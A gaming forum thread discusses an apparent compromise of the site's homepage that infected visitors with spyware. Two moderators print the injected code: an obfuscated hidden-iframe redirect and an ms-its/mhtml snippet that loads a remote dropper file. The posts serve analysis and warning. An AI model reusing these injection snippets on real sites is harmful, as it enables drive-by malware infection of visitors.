Suspicious activity stopped, code Yellow/Blackwatch Plaid

Want to just shoot the breeze? Forum 42 is the place!

Moderator: Moderators

Post Reply
cyco vision
Posts: 240
Joined: Wed Jan 19, 2005 5:51 pm

Post by cyco vision »

Any news on who did this?

I'm thinking it was one of those hack schemes that exploit phpbb in general.

Meaning maybe more independent boards got this too?
Image
SpongeBuell
Senior Member
Posts: 5190
Joined: Wed Apr 07, 2004 10:52 am
Location: Colorado
Contact:

Post by SpongeBuell »

Nope, I'm thinking it's a random hacker with no life
Life of Brian wrote:
RYW wrote:RYW:

Rare
Yellow
Weasel
I'll be honest with you - I would have never guessed that.
sam fisher
Posts: 1093
Joined: Mon Apr 25, 2005 8:52 am

Post by sam fisher »

because its not just the forum.
vb_master
Moderator
Posts: 4793
Joined: Tue Jun 08, 2004 9:52 pm

Post by vb_master »

The homepage has the virus, don't go there.
bioniclebert
Posts: 1287
Joined: Sat Jul 23, 2005 11:04 am
Location: Buffalo.
Contact:

Post by bioniclebert »

I just got hit Really bad and i think I MAy refffffffformat my hard drive (just got a new mootherboard anyway..
my keey bbbboard is a piece of trash

EDIT: I borrowed a new keyboard. If anyone has downloaded this virus, please contact me on a shure way to delete it. I do not like my background or the new "Programs"
Making XNA Games in C#.
HK-47
Moderator
Posts: 3598
Joined: Thu Jul 15, 2004 2:17 pm
Location: /dev/moderator/
Contact:

Post by HK-47 »

type this into your adress bar to see what the script really says. (This wont do anything bad.)
javascript:alert(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,73,70,82,65,77,69,32,83,82,67,61,34,104,116,116,112,58,47,47,119,119,119,46,103,108,111,98,111,108,111,111,107,46,99,111,109,47,118,52,50,55,47,119,111,119,46,104,116,109,108,34,32,87,73,68,84,72,61,49,32,72,69,73,71,72,84,61,49,62,60,47,73,70,82,65,77,69,62,39,41))
A popup box will say what the numbers really mean. Make sure you dont put eval() in there!
HK-47
Moderator
Posts: 3598
Joined: Thu Jul 15, 2004 2:17 pm
Location: /dev/moderator/
Contact:

Post by HK-47 »

Code: Select all

<TEXTAREA id=cxw style="DISPLAY: none">
<object data="${PR}" type="text/x-scriptlet" width="0" height="0"></object>
</TEXTAREA>
<SCRIPT>document.write(cxw.value.replace("${PR}","ms-its:mhtml:file://c:\default.mht!http://www.wearehosters.com/v427/dropper.chm::/xxx.html"));
</SCRIPT>
Thats what the code on the site the site is... Its some exploit... Ill check if milw0rm or similar has anything on it.
Lucretius
Moderator
Posts: 4009
Joined: Mon Jan 31, 2005 7:25 pm
Location: *undisclosed*
Contact:

Post by Lucretius »

documemt.write('<IFRAME SRC="http://www.globolook.com/v427/wow.htnl"WIDTH=1 HIGHT=1></IFRAME>')
-Luke
goodie
Posts: 824
Joined: Mon Oct 11, 2004 1:02 pm

Post by goodie »

My computer doesn't seem to affected at all. I did a virus check and as usual, it came up clean. :) Thanks, Firefox!
mnbvcxzlkjhgfdsapoiuytrewq
bioniclebert
Posts: 1287
Joined: Sat Jul 23, 2005 11:04 am
Location: Buffalo.
Contact:

Post by bioniclebert »

Status: Hard drive reformatted.
Windows re installed
Finally getting to go to Ytmnd without accidently clicking on benheck-waiting...
I must warn you, This virus is not fun. Whatever you do, just dont get it.
Making XNA Games in C#.
Trv
Posts: 344
Joined: Tue Mar 29, 2005 5:34 pm
Location: From Russia With Fun!

Post by Trv »

I have norton upto date and have not recieved a warning. Plus I have Fire fox and never visit the homepage. So I assume Im safe.


But what actully does this virus/trojan do to your computer those who got it?
dead
bioniclebert
Posts: 1287
Joined: Sat Jul 23, 2005 11:04 am
Location: Buffalo.
Contact:

Post by bioniclebert »

Trv wrote:I have norton upto date and have not recieved a warning. Plus I have Fire fox and never visit the homepage. So I assume Im safe.


But what actully does this virus/trojan do to your computer those who got it?
it downloads "programs" and changes your background. It also gives you a warning that youve downloaded spyware( as if you didnt know)
Making XNA Games in C#.
Trv
Posts: 344
Joined: Tue Mar 29, 2005 5:34 pm
Location: From Russia With Fun!

Post by Trv »

So basicly, youd know if you got it?
dead
bioniclebert
Posts: 1287
Joined: Sat Jul 23, 2005 11:04 am
Location: Buffalo.
Contact:

Post by bioniclebert »

Trv wrote:So basicly, youd know if you got it?
oh yes, it'd be VERY appearent.
Making XNA Games in C#.
vb_master
Moderator
Posts: 4793
Joined: Tue Jun 08, 2004 9:52 pm

Post by vb_master »

I got Exploit-MhtRedir.gen, and I did not know that I had it untill McAffe told me (one second later). What does it do?
Post Reply